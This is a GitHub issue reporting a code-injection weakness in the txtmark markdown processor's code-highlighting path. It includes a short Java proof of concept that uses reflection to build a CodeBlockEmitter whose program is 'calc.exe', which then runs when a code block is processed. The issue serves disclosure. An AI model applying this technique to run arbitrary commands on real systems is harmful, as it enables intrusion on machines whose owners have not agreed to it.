search

rjeschke / txtmark

Yet another markdown processor for the JVM
Apache License 2.0
449 stars 100 forks source link

There's a code injection vulnerability of `com.github.rjeschke.txtmark.cmd.HlUtils.highlight` #60

Open LetianYuan opened 1 year ago

LetianYuan commented 1 year ago

com.github.rjeschke.txtmark.cmd.HlUtils.highlight is designed to highlight code blocks. However, passing an unchecked argument to this API can lead to the execution of arbitrary commands. For instance, first, we create an instance of CodeBlockEmitter and specify the parameter program of CodeBlockEmitter to ”calc.exe”:

Configuration.Builder builder = Configuration.builder();
Class clazz = Class.forName("com.github.rjeschke.txtmark.cmd.CodeBlockEmitter");
Constructor constructor = clazz.getDeclaredConstructors()[0];
constructor.setAccessible(true);
Object cb = constructor.newInstance("UTF-8", "calc.exe");

Second, we set CodeBlockEmitter to the instance that we just created.

builder.setCodeBlockEmitter((BlockEmitter) cb);
builder.forceExtentedProfile();
Configuration config = builder.build();
System.out.println(Processor.process("```java\n123\n```\n", config));

Finally, malicious programs “calc.exe” would be executed.